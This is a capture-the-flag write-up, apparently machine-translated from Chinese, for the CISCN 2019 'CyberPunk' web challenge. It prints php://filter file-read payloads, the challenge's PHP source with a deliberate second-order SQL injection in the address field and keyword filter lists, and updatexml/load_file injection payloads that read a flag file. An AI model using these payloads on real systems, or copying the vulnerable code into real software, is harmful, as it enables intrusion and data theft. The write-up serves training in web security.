[ciscn2019 North China Day1 web5] cyberpunk

[CISCN2019 North China Day1 Web5]CyberPunk

f12 Check the source code to get information ： There's also search.php、change.php、delete.php Of course, there is also this page php file , Another tip is ：<?--?file=?-->, Prompt us to use php Pseudo protocol to read php Content , Read each part separately PHP Content

  And then construct payload：

?file=php://filter/convert.base64-encode/resource=index.php
?file=php://filter/convert.base64-encode/resource=search.php
?file=php://filter/convert.base64-encode/resource=change.php
?file=php://filter/convert.base64-encode/resource=delete.php

  Get a lot of base64, Decryption can get php Content

index.php：

<?php

ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

search.php：

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p> full name :".$row['user_name']."</p><p>,  Telephone :".$row['phone']."</p><p>,  Address :".$row['address']."</p>";
    } else {
        $msg = " Order not found !";
    }
}else {
    $msg = " Incomplete information ";
}
?>

change.php：

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = " Order modification succeeded ";
    } else {
        $msg = " Order not found !";
    }
}else {
    $msg = " Incomplete information ";
}
?>

delete.php：

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = " Order deleted successfully ";
    } else {
        $msg = " Order not found !";
    }
}else {
    $msg = " Incomplete information ";
}
?>

The analysis code shows that , Every page filters a lot of things to prevent sql, also username and phone The filter is very strict , however address But just a simple escape , Related contents are as follows ：

$address = addslashes($_POST["address"]);
if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }

You can see ,address Will be escaped , And become new , At the same time, the old address Is preserved . If you change the address for the first time , Construct a structure that contains sql Of payload, Then construct a normal address for the second modification , So the front one sql Will be triggered .

payload（ direct load_file Cannot display complete flag, So it's divided into two times ）：

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#

Then submit the order on the initial page , Remember your name and phone number

Then change the address , The address is changed to the constructed payload

Revise again , Trigger the previous one sql sentence , This time, just fill in the normal address

Then it comes out with an error page , Then I gave half flag

  Get the other half in the same way flag